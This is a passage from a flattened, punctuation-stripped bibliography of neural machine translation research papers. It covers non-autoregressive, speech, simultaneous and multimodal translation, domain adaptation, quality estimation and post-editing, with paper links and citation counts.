autoregressive neural machine translation with deterministic inference using a delta posterior https arxiv org abs 1908 07181 in proceedings of aaai 2020 jiawei zhou and phillip keung 2020 improving non autoregressive neural machine translation with monolingual data https arxiv org abs 2005 00932 in proceedings of acl 2020 marjan ghazvininejad vladimir karpukhin luke zettlemoyer and omer levy 2020 aligned cross entropy for non autoregressive machine translation https arxiv org abs 2004 01655 in proceedings of icml 2020 jungo kasai james cross marjan ghazvininejad and jiatao gu 2020 parallel machine translation with disentangled context transformer https arxiv org abs 2001 05136 in proceedings of icml 2020 junliang guo linli xu and enhong chen 2020 jointly masked sequence to sequence model for non autoregressive neural machine translation https www aclweb org anthology 2020 acl main 36 in proceedings of acl 2020 qiu ran yankai lin peng li and jie zhou 2020 learning to recover from multi modality errors for non autoregressive neural machine translation https www aclweb org anthology 2020 acl main 277 in proceedings of acl 2020 william chan mitchell stern jamie kiros jakob uszkoreit 2020 an empirical study of generation order for machine translation https www aclweb org anthology 2020 emnlp main 464 in proceedings of emnlp 2020 jason lee raphael shu kyunghyun cho 2020 iterative refinement in the continuous space for non autoregressive neural machine translation https www aclweb org anthology 2020 emnlp main 73 in proceedings of emnlp 2020 xiang kong zhisong zhang eduard hovy 2020 incorporating a local translation mechanism into non autoregressive translation https www aclweb org anthology 2020 emnlp main 79 in proceedings of emnlp 2020 chitwan saharia william chan saurabh saxena mohammad norouzi 2020 non autoregressive machine translation with latent alignments https www aclweb org anthology 2020 emnlp main 83 in proceedings of emnlp 2020 liang ding longyue wang di wu dacheng tao zhaopeng tu 2020 context aware cross attention for non autoregressive translation https www aclweb org anthology 2020 coling main 389 pdf in proceedings of coling 2020 jungo kasai nikolaos pappas hao peng james cross noah smith 2021 deep encoder shallow decoder reevaluating non autoregressive machine translation https openreview net pdf id kpfastalupq in proceedings of iclr 2021 liang ding longyue wang xuebo liu derek f wong dacheng tao zhaopeng tu 2021 understanding and improving lexical choice in non autoregressive translation https openreview net pdf id ztfesbix9c in proceedings of iclr 2021 qiu ran yankai lin peng li jie zhou 2021 guiding non autoregressive neural machine translation decoding with reordering information https arxiv org pdf 1911 02215 pdf in proceedings of aaai 2021 yongchang hao shilin he wenxiang jiao zhaopeng tu michael r lyu xing wang 2021 multi task learning with shared encoder for non autoregressive machine translation https www aclweb org anthology 2021 naacl main 313 pdf in proceedings of naacl 2021 yu bao shujian huang tong xiao dongqi wang xinyu dai jiajun chen 2021 non autoregressive translation by learning target categorical codes https www aclweb org anthology 2021 naacl main 458 pdf in proceedings of naacl 2021 liang ding longyue wang xuebo liu derek f wong dacheng tao zhaopeng tu 2021 progressive multi granularity training for non autoregressive translation https arxiv org pdf 2106 05546 pdf in proceedings of acl 2021 liang ding longyue wang xuebo liu derek f wong dacheng tao zhaopeng tu 2021 rejuvenating low frequency words making the most of parallel data in non autoregressive translation https arxiv org pdf 2106 00903 pdf in proceedings of acl 2021 cunxiao du zhaopeng tu jing jiang 2021 order agnostic cross entropy for non autoregressive machine translation https arxiv org pdf 2106 05093 pdf in proceedings of icml 2021 lihua qian hao zhou yu bao mingxuan wang lin qiu weinan zhang yong yu lei li 2021 glancing transformer for non autoregressive neural machine translation https aclanthology org 2021 acl long 155 pdf in proceedings of acl 2021 h3 id speech translation and simultaneous translation speech translation and simultaneous translation h3 matt post gaurav kumar adam lopez damianos karakos chris callison burch and sanjeev khudanpur 2013 improved speech to text translation with the fisher and callhome spanish english speech translation corpus http www mt archive info 10 iwslt 2013 post pdf in proceedings of iwslt 2013 citation https scholar google com hk scholar cites 11894485689812442585 as sdt 2005 sciodt 0 5 hl en 24 gaurav kumar matt post daniel povey and sanjeev khudanpur 2014 some insights from translating conversational telephone speech https ieeexplore ieee org abstract document 6854197 in proceedings of icassp 2014 citation https scholar google com hk scholar cites 8525865656244874295 as sdt 2005 sciodt 0 5 hl en 9 long duong antonios anastasopoulos david chiang steven bird and trevor cohn 2016 an attentional model for speech translation without transcription http www aclweb org anthology n16 1109 in proceedings of naacl 2016 citation https scholar google com hk scholar cites 17801967122712636447 as sdt 2005 sciodt 0 5 hl en 37 antonios anastasopoulos david chiang and long duong 2016 an unsupervised probability model for speech to translation alignment of low resource languages https aclweb org anthology d16 1133 in proceedings of emnlp 2016 citation https scholar google com hk scholar cites 323823800810193203 as sdt 2005 sciodt 0 5 hl en 9 ron j weiss jan chorowski navdeep jaitly yonghui wu and zhifeng chen 2017 sequence to sequence models can directly translate foreign speech https arxiv org abs 1703 08581 in proceedings of interspeech 2017 citation https scholar google com hk scholar cites 10073093152246570315 as sdt 2005 sciodt 0 5 hl en 41 jiatao gu graham neubig kyunghyun cho and victor o k li 2017 learning to translate in real time with neural machine translation http aclweb org anthology e17 1099 in proceedings of eacl 2017 citation https scholar google com hk scholar cites 14299891671990230013 as sdt 2005 sciodt 0 5 hl en 17 sameer bansal herman kamper adam lopez and sharon goldwater 2017 towards speech to text translation without speech recognition http aclweb org anthology e17 2076 in proceedings of eacl 2017 citation https scholar google com hk scholar cites 639319209334631051 as sdt 2005 sciodt 0 5 hl en 13 antonios anastasopoulos and david chiang 2018 tied multitask learning for neural speech translation https arxiv org pdf 1802 06655 pdf in proceedings of naacl 2018 citation https scholar google com hk scholar cites 5810351802252447673 as sdt 2005 sciodt 0 5 hl en 10 fahim dalvi nadir durrani hassan sajjad and stephan vogel 2018 incremental decoding and training methods for simultaneous translation in neural machine translation http aclweb org anthology n18 2079 in proceedings of naacl 2018 craig stewart nikolai vogler junjie hu jordan boyd graber and graham neubig 2018 automatic estimation of simultaneous interpreter performance http aclweb org anthology p18 2105 in proceedings of acl 2018 citation https scholar google com hk scholar cites 5687670489913511293 as sdt 2005 sciodt 0 5 hl en 1 florian dessloch thanh le ha markus m ller jan niehues thai son nguyen ngoc quan pham elizabeth salesky matthias sperber sebastian st ker thomas zenkel and alexander waibel 2018 kit lecture translator multilingual speech translation with one shot learning http aclweb org anthology c18 2020 in proceedings of coling 2018 ashkan alinejad maryam siahbani and anoop sarkar 2018 prediction improves simultaneous neural machine translation http aclweb org anthology d18 1337 in proceedings of emnlp 2018 sameer bansal herman kamper karen livescu adam lopez and sharon goldwater 2019 pre training on high resource speech recognition improves low resource speech to text translation https arxiv org pdf 1809 01431 pdf in proceedings of naacl 2019 nikolai vogler craig stewart and graham neubig 2019 lost in interpretation predicting untranslated terminology in simultaneous interpretation https arxiv org pdf 1904 00930 pdf in proceedings of naacl 2019 elizabeth salesky matthias sperber and alex waibel 2019 fluent translations from disfluent speech in end to end speech translation https arxiv org pdf 1906 00556 in proceedings of naacl 2019 naveen arivazhagan colin cherry wolfgang macherey chung cheng chiu semih yavuz ruoming pang wei li and colin raffel 2019 monotonic infinite lookback attention for simultaneous machine translation https arxiv org pdf 1906 05218 in proceedings of acl 2019 matthias sperber graham neubig ngoc quan pham and alex waibel 2019 self attentional models for lattice inputs https arxiv org pdf 1906 01617 in proceedings of acl 2019 pei zhang boxing chen niyu ge and kai fan 2019 lattice transformer for speech translation https arxiv org pdf 1906 05551 in proceedings of acl 2019 naveen arivazhagan colin cherry wolfgang macherey chung cheng chiu semih yavuz ruoming pang wei li and colin raffel 2019 monotonic infinite lookback attention for simultaneous machine translation https www aclweb org anthology p19 1126 in proceedings of acl 2019 elizabeth salesky matthias sperber and alan w black 2019 exploring phoneme level speech representations for end to end speech translation https www aclweb org anthology p19 1179 in proceedings of acl 2019 mingbo ma liang huang hao xiong renjie zheng kaibo liu baigong zheng chuanqiang zhang zhongjun he hairong liu xing li hua wu and haifeng wang 2019 stacl simultaneous translation with implicit anticipation and controllable latency using prefix to prefix framework https www aclweb org anthology p19 1289 in proceedings of acl 2019 baigong zheng renjie zheng mingbo ma and liang huang 2019 simultaneous translation with flexible policy via restricted imitation learning https www aclweb org anthology p19 1582 in proceedings of acl 2019 matthias sperber graham neubig jan niehues alex waibel 2019 attention passing models for robust and data efficient end to end speech translation https www mitpressjournals org doi pdf 10 1162 tacl a 00270 transactions of the association for computational linguistics baigong zheng renjie zheng mingbo ma and liang huang 2019 simpler and faster learning of adaptive policies for simultaneous translation https arxiv org pdf 1909 01559 in proceedings of emnlp 2019 renjie zheng mingbo ma baigong zheng and liang huang 2019 speculative beam search for simultaneous translation https arxiv org pdf 1909 05421 in proceedings of emnlp 2019 jiatao gu changhan wang junbo zhao 2019 levenshtein transformer https papers nips cc paper 9297 levenshtein transformer in proceedings of neurips 2019 chengyi wang yu wu shujie liu ming zhou and zhenglu yang 2020 curriculum pre training for end to end speech translation https arxiv org abs 2004 10093 in proceedings of acl 2020 elizabeth salesky and alan w black 2020 phone features improve speech translation https arxiv org abs 2005 13681 in proceedings of acl 2020 matthias sperber and matthias paulik 2020 speech translation and the end to end promise taking stock of where we are https arxiv org abs 2004 06358 in proceedings of acl 2020 renjie zheng mingbo ma baigong zheng kaibo liu and liang huang 2020 opportunistic decoding with timely correction for simultaneous translation https arxiv org abs 2005 00675 in proceedings of acl 2020 baigong zheng kaibo liu renjie zheng mingbo ma hairong liu and liang huang 2020 simultaneous translation policies from fixed to adaptive http arxiv org abs 2004 13169 in proceedings of acl 2020 shun po chuang tzu wei sung alexander h liu and hung yi lee 2020 worse wer but better bleu leveraging word embedding as intermediate in multitask end to end speech translation https arxiv org abs 2005 10678 in proceedings of acl 2020 yi ren jinglin liu xu tan chen zhang tao qin zhou zhao and tie yan liu 2020 simulspeech end to end simultaneous speech to text translation https www aclweb org anthology 2020 acl main 350 in proceedings of acl 2020 ashkan alinejad anoop sarkar 2020 effectively pretraining a speech translation decoder with machine translation data https www aclweb org anthology 2020 emnlp main 644 in proceedings of emnlp 2020 ruiqing zhang chuanqiang zhang zhongjun he hua wu haifeng wang 2020 learning adaptive segmentation policy for simultaneous translation https www aclweb org anthology 2020 emnlp main 178 in proceedings of emnlp 2020 ozan caglayan julia ive veneta haralampieva pranava madhyastha lo c barrault lucia specia 2020 simultaneous machine translation with visual context https www aclweb org anthology 2020 emnlp main 184 in proceedings of emnlp 2020 javier iranzo s nchez adri gim nez pastor joan albert silvestre cerd pau baquero arnal jorge civera saiz alfons juan 2020 direct segmentation models for streaming speech translation https www aclweb org anthology 2020 emnlp main 206 in proceedings of emnlp 2020 h3 id multi modality multi modality h3 julian hitschler shigehiko schamoni stefan riezler 2016 multimodal pivots for image caption translation http aclweb org anthology p16 1227 in proceedings of acl 2016 citation https scholar google com scholar oi bibs hl en cites 2998317485328832141 34 lucia specia stella frank khalil sima an and desmond elliott 2016 a shared task on multimodal machine translation and crosslingual image description http aclweb org anthology w16 2346 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar google com hk scholar hl en as sdt 2005 sciodt 0 5 cites 10227072007263391757 scipsc 47 sergio rodr guez guasch marta r costa juss 2016 wmt 2016 multimodal translation system description based on bidirectional recurrent neural networks with double embeddings http aclweb org anthology w16 2362 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar google com hk scholar cites 4203794059992068345 as sdt 2005 sciodt 0 5 hl en 2 po yao huang frederick liu sz rung shiang jean oh and chris dyer 2016 attention based multimodal neural machine translation https www aclweb org anthology w16 2360 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar google com hk scholar cites 3098391471855879500 as sdt 2005 sciodt 0 5 hl en 34 iacer calixto desmond elliott and stella frank 2016 dcu uva multimodal mt system report http aclweb org anthology w16 2359 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar google com hk scholar cites 13635685318707561524 as sdt 2005 sciodt 0 5 hl en 12 kashif shah josiah wang and lucia specia 2016 shef multimodal grounding machine translation on images https aclweb org anthology w16 2363 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar google com scholar cites 11223367231679829742 as sdt 5 39 sciodt 0 39 hl en 17 desmond elliott stella frank lo c barrault fethi bougares and lucia specia 2017 findings of the second shared task on multimodal machine translation and multilingual image description http aclweb org anthology w17 4718 in proceedings of the second conference on machine translation citation https scholar google com hk scholar cites 268734032292286129 as sdt 2005 sciodt 0 5 hl en 24 iacer calixto qun liu and nick campbell 2017 doubly attentive decoder for multi modal neural machine translation http aclweb org anthology p17 1175 in proceedings of acl 2017 citation https scholar google com hk scholar cites 9882133753270023054 as sdt 2005 sciodt 0 5 hl en 31 jean benoit delbrouck and st phane dupont 2017 an empirical study on the effectiveness of images in multimodal neural machine translation http aclweb org anthology d17 1095 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 4462543203996753904 as sdt 2005 sciodt 0 5 hl en 2 iacer calixto and qun liu 2017 incorporating global visual features into attention based neural machine translation http aclweb org anthology d17 1105 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 6076628072948213440 as sdt 2005 sciodt 0 5 hl en 14 jason lee kyunghyun cho jason weston and douwe kiela 2018 emergent translation in multi agent communication https openreview net pdf id h1vexaxa in proceedings of iclr 2018 citation https scholar google com hk scholar cites 16875774594076963034 as sdt 2005 sciodt 0 5 hl en 8 yun chen yang liu and victor o k li 2018 zero resource neural machine translation with multi agent communication game https arxiv org pdf 1802 03116 in proceedings of aaai 2018 citation https scholar google com hk scholar cites 13902575159717479954 as sdt 2005 sciodt 0 5 hl en 6 lo c barrault fethi bougares lucia specia chiraag lala desmond elliott and stella frank 2018 findings of the third shared task on multimodal machine translation http aclweb org anthology w18 6402 in proceedings of the third conference on machine translation shared task papers citation https scholar google com hk scholar cites 1407951263246368352 as sdt 2005 sciodt 0 5 hl en 1 john hewitt daphne ippolito brendan callahan reno kriz derry tanti wijaya and chris callison burch 2018 learning translations via images with a massively multilingual image dataset http aclweb org anthology p18 1239 in proceedings of acl 2018 citation https scholar google com hk scholar cites 8128328221941110465 as sdt 2005 sciodt 0 5 hl en 1 mingyang zhou runxiang cheng yong jae lee and zhou yu 2018 a visual attention grounding neural model for multimodal machine translation http aclweb org anthology d18 1400 in proceedings of emnlp 2018 desmond elliott 2018 adversarial evaluation of multimodal machine translation http aclweb org anthology d18 1329 in proceedings of emnlp 2018 ozan caglayan pranava madhyastha lucia specia and lo c barrault 2019 probing the need for visual context in multimodal machine translation https arxiv org pdf 1903 08678 pdf in proceedings of naacl 2019 iacer calixto miguel rios and wilker aziz 2019 latent variable model for multi modal translation https arxiv org pdf 1811 00357 in proceedings of acl 2019 julia ive pranava madhyastha and lucia specia 2019 distilling translations with visual awareness https arxiv org pdf 1906 07701 in proceedings of acl 2019 zhuosheng zhang kehai chen rui wang masao utiyama eiichiro sumita zuchao li hai zhao 2020 neural machine translation with universal visual representation https openreview net forum id byl8hhnyps in proceedings of iclr 2020 po yao huang junjie hu xiaojun chang and alexander hauptmann 2020 unsupervised multimodal neural machine translation with pseudo visual pivoting http arxiv org abs 2005 03119 in proceedings of acl 2020 shu okabe fr d ric blain and lucia specia 2020 multimodal quality estimation for machine translation https www aclweb org anthology 2020 acl main 114 in proceedings of acl 2020 shaowei yao and xiaojun wan 2020 multimodal transformer for multimodal machine translation https www aclweb org anthology 2020 acl main 400 in proceedings of acl 2020 shuo sun francisco guzm n and lucia specia 2020 are we estimating or guesstimating translation quality https www aclweb org anthology 2020 acl main 558 in proceedings of acl 2020 ozan caglayan julia ive veneta haralampieva pranava madhyastha lo c barrault lucia specia 2020 simultaneous machine translation with visual context https www aclweb org anthology 2020 emnlp main 184 in proceedings of emnlp 2020 h3 id ensemble reranking ensemble and reranking h3 ekaterina garmash and christof monz 2016 ensemble learning for multi source neural machine translation http aclweb org anthology c16 1133 in proceedings of coling 2016 citation https scholar google com scholar cites 10720572689338720536 as sdt 2005 sciodt 0 5 hl en 18 long zhou wenpeng hu jiajun zhang and chengqing zong 2017 neural system combination for machine translation http aclweb org anthology p17 2060 in proceedings of acl 2017 citation https scholar google com scholar cites 2547807449547851378 as sdt 2005 sciodt 0 5 hl en 21 jiaji huang yi li wei ping and liang huang 2018 large margin neural language model http aclweb org anthology d18 1150 in proceedings of emnlp 2018 tianxiao shen myle ott michael auli and marc aurelio ranzato 2019 mixture models for diverse machine translation tricks of the trade http proceedings mlr press v97 shen19c shen19c pdf in proceedings of icml 2019 yiren wang lijun wu yingce xia tao qin chengxiang zhai and tie yan liu 2020 transductive ensemble learning for neural machine translation https publish illinois edu yirenwang in proceedings of aaai 2020 h3 id domain adaptation domain adaptation h3 chenhui chu raj dabre and sadao kurohashi 2017 an empirical comparison of domain adaptation methods for neural machine translation http aclweb org anthology p17 2061 in proceedings of acl 2017 citation https scholar google com hk scholar cites 11154619650853156425 as sdt 2005 sciodt 0 5 hl en 40 rui wang andrew finch masao utiyama and eiichiro sumita 2017 sentence embedding for neural machine translation domain adaptation http aclweb org anthology p17 2089 in proceedings of acl 2017 citation https scholar google com hk scholar cites 12026801731726213856 as sdt 2005 sciodt 0 5 hl en 8 boxing chen colin cherry george foster and samuel larkin 2017 cost weighting for neural machine translation domain adaptation http aclweb org anthology w17 3205 in proceedings of the first workshop on neural machine translation citation https scholar google com hk scholar cites 11511062396100603245 as sdt 2005 sciodt 0 5 hl en 10 reid pryzant and denny britz 2017 effective domain mixing for neural machine translation http aclweb org anthology w17 4712 in proceedings of the second conference on machine translation citation https scholar google com hk scholar cites 5830143292179945460 as sdt 2005 sciodt 0 5 hl en 6 mara chinea rios lvaro peris and francisco casacuberta 2017 adapting neural machine translation with parallel synthetic data http aclweb org anthology w17 4714 in proceedings of the second conference on machine translation citation https scholar google com scholar cites 14166012599677352590 as sdt 2005 sciodt 0 5 hl en 3 rui wang masao utiyama lemao liu kehai chen and eiichiro sumita 2017 instance weighting for neural machine translation domain adaptation http aclweb org anthology d17 1155 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 11790197905041828318 as sdt 2005 sciodt 0 5 hl en 13 antonio valerio miceli barone barry haddow ulrich germann and rico sennrich 2017 regularization techniques for fine tuning in neural machine translation http aclweb org anthology d17 1156 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 10429379661740278678 as sdt 2005 sciodt 0 5 hl en 6 david vilar 2018 learning hidden unit contribution for adapting neural machine translation models http aclweb org anthology n18 2080 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 5262017870970882749 as sdt 2005 sciodt 0 5 hl en 2 paul michel and graham neubig 2018 extreme adaptation for personalized neural machine translation http aclweb org anthology p18 2050 in proceedings for acl 2018 citation https scholar google com hk scholar cites 16717798879574507487 as sdt 2005 sciodt 0 5 hl en 6 shiqi zhang and deyi xiong 2018 sentence weighting for neural machine translation domain adaptation http aclweb org anthology c18 1269 in proceedings of coling 2018 chenhui chu and rui wang 2018 a survey of domain adaptation for neural machine translation http aclweb org anthology c18 1111 in proceedings of coling 2018 citation https scholar google com hk scholar cites 12774117070156464640 as sdt 2005 sciodt 0 5 hl en 7 jiali zeng jinsong su huating wen yang liu jun xie yongjing yin and jianqiang zhao 2018 multi domain neural machine translation with word level domain context discrimination http aclweb org anthology d18 1041 in proceedings of emnlp 2018 graham neubig and junjie hu 2018 rapid adaptation of neural machine translation to new languages http aclweb org anthology d18 1103 in proceedings of emnlp 2018 citation https scholar google com hk scholar cites 18133973017615911986 as sdt 2005 sciodt 0 5 hl en 4 shuhao gu yang feng and qun liu 2019 improving domain adaptation translation with domain invariant and specific information https arxiv org pdf 1904 03879 pdf in proceedings of naacl 2019 ankur bapna and orhan firat 2019 non parametric adaptation for neural machine translation https arxiv org pdf 1903 00058 pdf in proceedings of naacl 2019 junjie hu mengzhou xia graham neubig and jaime carbonell 2019 domain adaptation of neural machine translation by lexicon induction https arxiv org pdf 1906 00376 in proceedings of acl 2019 danielle saunders felix stahlberg adria de gispert and bill byrne 2019 domain adaptive inference for neural machine translation https arxiv org pdf 1906 00408 in proceedings of acl 2019 zi yi dou junjie hu antonios anastasopoulos and graham neubig 2019 unsupervised domain adaptation for neural machine translation with domain aware feature embeddings https arxiv org pdf 1908 10430 pdf in proceedings of emnlp 2019 ankur bapna naveen arivazhagan and orhan firat 2019 simple scalable adaptation for neural machine translation https arxiv org pdf 1909 08478 in proceedings of emnlp 2019 jiali zeng yang liu jinsong su yubing ge yaojie lu yongjing yin and jiebo luo 2019 iterative dual domain adaptation for neural machine translation https www aclweb org anthology d19 1078 pdf in proceedings of emnlp 2019 wei wang ye tian jiquan ngiam yinfei yang isaac caswell and zarana parekh 2020 learning a multi domain curriculum for neural machine translation https arxiv org abs 1908 10940 in proceedings of acl 2020 chaojun wang and rico sennrich 2020 on exposure bias hallucination and domain shift in neural machine translation https arxiv org abs 2005 03642 in proceedings of acl 2020 haoming jiang chen liang chong wang and tuo zhao 2020 multi domain neural machine translation with word level adaptive layer wise domain mixing https www aclweb org anthology 2020 acl main 165 in proceedings of acl 2020 anna currey prashant mathur georgiana dinu 2020 distilling multiple domains for neural machine translation https www aclweb org anthology 2020 emnlp main 364 in proceedings of emnlp 2020 haoyue shi luke zettlemoyer sida i wang 2021 bilingual lexicon induction via unsupervised bitext construction and word alignment https aclanthology org 2021 acl long 67 in proceedings of acl 2021 h3 id quality estimation quality estimation h3 julia kreutzer shigehiko schamoni stefan riezler 2015 quality estimation from scratch quetch deep learning for word level translation quality estimation http www aclweb org anthology w15 3037 in proceedings of the tenth workshop on statistical machine translation citation https scholar google com scholar cites 2308754825624963103 as sdt 2005 sciodt 0 5 hl en 24 hyun kim and jong hyeok lee 2016 a recurrent neural networks approach for estimating the quality of machine translation output http aclweb org anthology n16 1059 in proceedings of naacl 2016 citation https scholar google com hk scholar cites 830241254846777269 as sdt 2005 sciodt 0 5 hl en 11 hyun kim and jong hyeok lee seung hoon na 2017 predictor estimator using multilevel task learning with stack propagation for neural quality estimation http aclweb org anthology w17 4763 in proceedings of wmt 2017 citation https scholar google com hk scholar cites 14077676925816230812 as sdt 2005 sciodt 0 5 hl en 10 osman baskaya eray yildiz doruk tunaoglu mustafa tolga eren and a seza do ru z 2017 integrating meaning into quality evaluation of machine translation http aclweb org anthology e17 1020 in proceedings of eacl 2017 yvette graham qingsong ma timothy baldwin qun liu carla parra and carolina scarton 2017 improving evaluation of document level machine translation quality estimation http aclweb org anthology e17 2057 in proceedings of eacl 2017 citation https scholar google com hk scholar cites 13409644842476040211 as sdt 2005 sciodt 0 5 hl en 1 rico sennrich 2017 how grammatical is character level neural machine translation assessing mt quality with contrastive translation pairs http aclweb org anthology e17 2060 in proceedings of eacl 2017 citation https scholar google com hk scholar cites 14294900718072928557 as sdt 2005 sciodt 0 5 hl en 25 pierre isabelle colin cherry and george foster 2017 a challenge set approach to evaluating machine translation http aclweb org anthology d17 1263 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 10744403566307443052 as sdt 2005 sciodt 0 5 hl en 26 andr f t martins marcin junczys dowmunt fabio n kepler ram n astudillo chris hokamp and roman grundkiewicz 2017 pushing the limits of translation quality estimation http aclweb org anthology q17 1015 transactions of the association for computational linguistics citation https scholar google com hk scholar cites 17497507120611954135 as sdt 2005 sciodt 0 5 hl en 13 maoxi li qingyu xiang zhiming chen and mingwen wang 2018 a unified neural network for quality estimation of machine translation https www jstage jst go jp article transinf e101 d 9 e101 d 2018edl8019 article char en ieice transactions on information and systems citation https scholar google com hk scholar cites 17497507120611954135 as sdt 2005 sciodt 0 5 hl en 13 lucia specia fr d ric blain varvara logacheva ram n f astudillo and andr martins 2018 findings of the wmt 2018 shared task on quality estimation http aclweb org anthology w18 6451 in proceedings of the third conference on machine translation citation https scholar google com hk scholar cites 11225823265419143916 as sdt 2005 sciodt 0 5 hl en 2 craig stewart nikolai vogler junjie hu jordan boyd graber and graham neubig 2018 automatic estimation of simultaneous interpreter performance http aclweb org anthology p18 2105 in proceedings of acl 2018 citation https scholar google com hk scholar hl en as sdt 2005 sciodt 0 5 cites 5687670489913511293 scipsc 1 holger schwenk 2018 filtering and mining parallel data in a joint multilingual space http aclweb org anthology p18 2037 in proceedings of acl 2018 citation https scholar google com hk scholar cites 7363119514762721542 as sdt 2005 sciodt 0 5 hl en 4 julia ive fr d ric blain and lucia specia 2018 deepquest a framework for neural based quality estimation http aclweb org anthology c18 1266 in proceedings of coling 2018 citation https scholar google com hk scholar cites 4501237247493636014 as sdt 2005 sciodt 0 5 hl en 1 kai fan jiayi wang bo li fengming zhou boxing chen and luo si 2019 bilingual expert can find translation errors https arxiv org pdf 1807 09433 in proceedings of aaai 2019 aditya siddhant melvin johnson henry tsai naveen arivazhagan jason riesa ankur bapna orhan firat and karthik raman 2020 evaluating the cross lingual effectiveness of massively multilingual neural machine translation https arxiv org abs 1909 00437 in proceedings of aaai 2020 shu okabe fr d ric blain and lucia specia 2020 multimodal quality estimation for machine translation https www aclweb org anthology 2020 acl main 114 in proceedings of acl 2020 marina fomicheva shuo sun lisa yankovskaya fr d ric blain francisco guzm n mark fishel nikolaos aletras vishrav chaudhary and lucia specia 2020 unsupervised quality estimation for neural machine translation https arxiv org abs 2005 10608 transactions of the association for computational linguistics jingyi zhang josef van genabith 2020 translation quality estimation by jointly learning to score and rank https www aclweb org anthology 2020 emnlp main 205 in proceedings of emnlp 2020 vania mendonca ricardo rei lu sa coheur alberto sardinha ana lucia santos 2021 online learning meets machine translation evaluation finding the best systems with the least human effort https aclanthology org 2021 acl long 242 pdf in proceedings of acl 2021 h3 id human centered human centered nmt h3 h4 id interactive nmt interactive nmt h4 joern wuebker spence green john denero sa a hasan and minh thang luong 2016 models and inference for prefix constrained machine translation http aclweb org anthology p16 1007 in proceedings of acl 2016 citation https scholar google com scholar cites 6217828709297735294 as sdt 2005 sciodt 0 5 hl es 14 rebecca knowles and philipp koehn 2017 neural interactive translation prediction https www cs jhu edu phi publications neural interactive translation pdf in proceedings of amta 2016 citation https scholar google es scholar cites 16855799109441363843 as sdt 2005 sciodt 0 5 hl es 24 lvaro peris miguel domingo and francisco casacuberta 2017 interactive neural machine translation https www researchgate net publication 312275926 in computer speech and language citation https scholar google com scholar oi bibs hl es cites 2848232799976037224 as sdt 5 21 khanh nguyen hal daum iii and jordan boyd graber 2017 reinforcement learning for bandit neural machine translation with simulated human feedback http aclweb org anthology d17 1153 in proceedings of emnlp 2017 citation https scholar google com hk scholar cites 15247143946986909844 as sdt 2005 sciodt 0 5 hl en 11 lvaro peris and francisco casacuberta 2018 active learning for interactive neural machine translation of data streams http aclweb org anthology k18 1015 in proceedings of conll 2018 citation https scholar google com scholar oi bibs hl es cites 14996862010471139834 as sdt 5 1 tsz kin lam julia kreutzer and stefan riezler 2018 a reinforcement learning approach to interactive predictive neural machine translation https arxiv org pdf 1805 01553 in proceedings of eamt 2018 julia kreutzer shahram khadivi evgeny matusov stefan riezler 2018 can neural machine translation be improved with user feedback http aclweb org anthology n18 3012 in proceedings of naacl 2018 citation https scholar google com scholar oi bibs hl en cites 5878376279798739633 3 pavel petrushkov shahram khadivi and evgeny matusov 2018 learning from chunk based feedback in neural machine translation http aclweb org anthology p18 2052 in proceedings of acl 2018 citation https scholar google com hk scholar cites 11022197412542590938 as sdt 2005 sciodt 0 5 hl en 1 julia kreutzer joshua uyheng and stefan riezler 2018 reliability and learnability of human bandit feedback for sequence to sequence reinforcement learning http aclweb org anthology p18 1165 in proceedings of acl 2018 citation https scholar google com hk scholar cites 13544384067638756323 as sdt 2005 sciodt 0 5 hl en 2 lvaro peris and francisco casacuberta 2019 a neural interactive predictive system for multimodal sequence to sequence tasks https arxiv org pdf 1905 08181 in proceedings of acl 2019 miguel domingo mercedes garc a mart nez amando estela laurent bi alexandre helle lvaro peris francisco casacuberta and manuerl herranz 2019 demonstration of a neural machine translation system with online learning for translators https arxiv org pdf 1906 09000 in proceedings of acl 2019 julia kreutzer and stefan riezler 2019 self regulated interactive sequence to sequence learning https arxiv org pdf 1907 05190 pdf in proceedings of acl 2019 h4 id ape automatic post editing h4 santanu pal sudip kumar naskar mihaela vela and josef van genabith 2016 a neural network based approach to automatic post editing http aclweb org anthology p16 2046 in proceedings of acl 2016 citation https scholar google com hk scholar cites 12283909725778804406 as sdt 2005 sciodt 0 5 hl en 14 marcin junczys dowmunt and roman grundkiewicz 2016 log linear combinations of monolingual and bilingual neural machine translation models for automatic post editing http aclweb org anthology w16 2378 in proceedings of the first conference on machine translation volume 2 shared task papers citation https scholar google com hk scholar cites 8379495332607620604 as sdt 2005 sciodt 0 5 hl en 27 santanu pal sudip kumar naskar mihaela vela qun liu and josef van genabith 2017 neural automatic post editing using prior alignment and reranking http aclweb org anthology e17 2056 in proceedings of eacl 2017 citation https scholar google com hk scholar cites 17137949386428082191 as sdt 2005 sciodt 0 5 hl en 11 rajen chatterjee gebremedhen gebremelak matteo negri and marco turchi 2017 online automatic post editing for mt in a multi domain translation environment http aclweb org anthology e17 1050 in proceedings of eacl 2017 citation https scholar google com hk scholar cites 16624698279716802422 as sdt 2005 sciodt 0 5 hl en 1 marcin junczys dowmunt roman grundkiewicz 2017 an exploration of neural sequence to sequence architectures for automatic post editing http aclweb org anthology i17 1013 in proceedings of ijcnlp 2017 david grangier and michael auli 2018 quickedit editing text translations by crossing words out http aclweb org anthology n18 1025 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 9500777791162222168 as sdt 2005 sciodt 0 5 hl en 1 thuy trang vu and gholamreza haffari 2018 automatic post editing of machine translation a neural programmer interpreter approach http aclweb org anthology d18 1341 in proceedings of emnlp 2018 marcin junczys dowmunt roman grundkiewicz 2018 ms uedin submission to the wmt2018 ape shared task dual source transformer for automatic post editing https arxiv org pdf 1809 00188 pdf in proceedings of wmt 2018 gon alo m correia and andr f t martins 2019 a simple and effective approach to automatic post editing with transfer learning https arxiv org pdf 1906 06253 in proceedings of acl 2019 xuancheng huang yang liu huanbo luan jingfang xu maosong sun 2019 learning to copy for automatic post editing https www aclweb org anthology d19 1634 pdf in proceedings of emnlp 2019 nico herbig tim d wel santanu pal kalliopi meladaki mahsa monshizadeh antonio kr ger and josef van genabith 2020 mmpe a multi modal interface for post editing machine translation https www aclweb org anthology 2020 acl main 155 in proceedings of 